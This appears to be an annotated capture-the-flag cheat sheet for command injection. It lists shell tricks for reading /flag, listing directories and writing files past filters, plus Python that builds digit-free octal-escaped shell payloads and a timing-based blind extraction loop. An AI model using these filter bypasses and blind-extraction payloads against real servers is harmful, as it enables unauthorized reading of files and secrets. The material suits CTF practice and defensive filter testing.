# --- Reading a file ---
# Plain file viewers; any of them dumps the target when run as `<viewer> /flag`.
cat/tac/more/less/head/tail/nl/od/uniq
# grep prints matching lines, so with a permissive pattern it doubles as a file reader.
grep test flag.php
# The PHP interpreter parses the file: its contents are executed as PHP code, same effect as include().
php /flag
# -t sets a document root and -r runs inline code; the original note lists this as an
# open_basedir bypass.  NOTE(review): open_basedir is a php.ini restriction, whether the CLI
# honours it on this target depends on its configuration - confirm before relying on it.
php -t / -r "include('/flag');"
# Feed the file to sh with stderr merged into stdout: each line fails as a command and the
# error message echoes it back (the original note says this is how AntSword reads files).
sh /flag 2>&1
# sed's p command prints every line; the file argument is missing from the original note.
sed p
# --- Listing a directory ---
# du -a recurses and prints every file it sizes, so it works as a directory listing.
du -a .
# chgrp -v reports each file it touches, which also reveals names; the group and target
# path are missing from the original note.  NOTE(review): -R actually changes group
# ownership of everything under the target - noisy and destructive on a real host.
chgrp -v -R
# --- Packing files ---
# Archive the current directory into xxx.tar (c = create, v = verbose, f = file).
# This only packs; despite the original note, cvf does not compress (that would need z/j).
tar cvf xxx.tar .
# --- Writing a file ---
# Redirect command output into a file.
ls > xxx
# tee writes the output to the file and still prints it.
ls | tee xxx
# script -a appends a recorded terminal session to xxx; the commands run one after another, then exit.
script -a xxx; ls; exit;
# Drop a shell script that reads /flag line by line.  %23 is a URL-encoded '#': the shebang is
# sent through a web parameter, so this only yields a valid "#!" if the server URL-decodes the
# value before it reaches the shell - otherwise the file starts with a literal "%23!".
# \$line is escaped so the variable survives for the written script instead of expanding here.
echo -e "%23!/bin/sh\nwhile read line\ndo\necho \$line\ndone < /flag" > ../../../read  # write a shell script
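def str_to_oct(cmd):
    """Encode *cmd* as a run of backslash-octal escapes (``"ls"`` -> ``"\\154\\163"``).

    The result is meant for an ANSI-C quoted shell string (``$'...'``), which
    expands ``\\NNN`` to the byte NNN.  Text is encoded as UTF-8 first and
    converted byte by byte, so every group is at most three octal digits; the
    previous ``oct(ord(ch))[2:]`` form emitted longer groups for code points
    above 0o377, which the shell cannot read as a single escape.

    Args:
        cmd: command text (``str``) or raw ``bytes``.

    Returns:
        ``str`` of ``\\NNN`` groups, one per byte; empty input gives ``""``.
    """
    raw = cmd.encode() if isinstance(cmd, str) else bytes(cmd)
    # '%o' needs no '0o' prefix stripping and gives the same digits on Python 2 and 3.
    return ''.join('\\%o' % byte for byte in raw)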
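def build(cmd, digit_table=None):
    """Wrap *cmd* in the ``$0<<<$0\\<\\<\\<\\$'...'`` form used for alphanumeric-free injection.

    The outer shell feeds ``$0<<<$'\\NNN...'`` to a second shell via a here-string;
    the inner ``$'...'`` expands the octal escapes back into the original command.
    Each octal digit is then replaced through *digit_table* so the final payload
    contains no literal digits.

    Args:
        cmd: command to encode (passed to ``str_to_oct``).
        digit_table: indexable mapping from decimal digit (0-9) to its replacement
            string.  Defaults to the module-level ``n`` table, which is defined
            elsewhere in this file (presumably digit-free shell expressions that
            evaluate to each digit - confirm against the table itself).

    Returns:
        The payload string.
    """
    table = n if digit_table is None else digit_table
    # Same bytes as the original literal, but spelled with valid escapes: "\<" and "\$"
    # are not Python escape sequences and raise a SyntaxWarning from Python 3.12 on.
    payload = "$0<<<$0\\<\\<\\<\\$\\'"
    # split('\\') yields a leading empty element before the first "\NNN" group.
    for octal_group in str_to_oct(cmd).split('\\')[1:]:
        payload += "\\\\"          # two backslashes: one survives each shell pass
        for digit in octal_group:
            payload += table[int(digit)]
    return payload + "\\'"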
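def get_flag(url, payload, timeout=1.5):
    """Timing oracle for the blind extraction loop.

    POSTs *payload* as the ``cmd`` form field.  The injected command appends
    ``sleep 3`` on a successful guess (see the loop below), so a request that
    exceeds *timeout* means the guess matched.

    Args:
        url: target endpoint.
        payload: command string, normally the output of ``build``.
        timeout: seconds to wait; must be shorter than the injected sleep.

    Returns:
        True when the request timed out (guess matched), False when the server
        answered in time.

    Raises:
        requests.RequestException: for any failure other than a timeout.  The
        original bare ``except:`` turned connection errors - and KeyboardInterrupt -
        into a false "match", which silently corrupts the extracted value.
    """
    try:
        requests.post(url, data={'cmd': payload}, timeout=timeout)
    except requests.exceptions.Timeout:
        return True
    return False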
# --- Blind (timing-based) extraction loop, kept commented out in the original ---
# a = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_{}@'
# f = ''   # NOTE(review): the original never initialises f before `f = f+j`
# for i in range(1, 50):
#     for j in a:
#         cmd = f'cat /flag|grep ^{f+j}&&sleep 3'
#         url = "http://ip/"
#         if get_flag(url, build(cmd)):
#             break
#     f = f + j
#     print(f)
# Each round guesses the next character: grep anchors on the prefix recovered so far, and
# a match runs `sleep 3`, which exceeds get_flag's 1.5 s timeout and is read as True.
# Indentation was lost in the source; the nesting above is the reading under which the
# break/append sequence works (append j once the inner loop exits).  Note that if no
# candidate matches, the last character of a is still appended.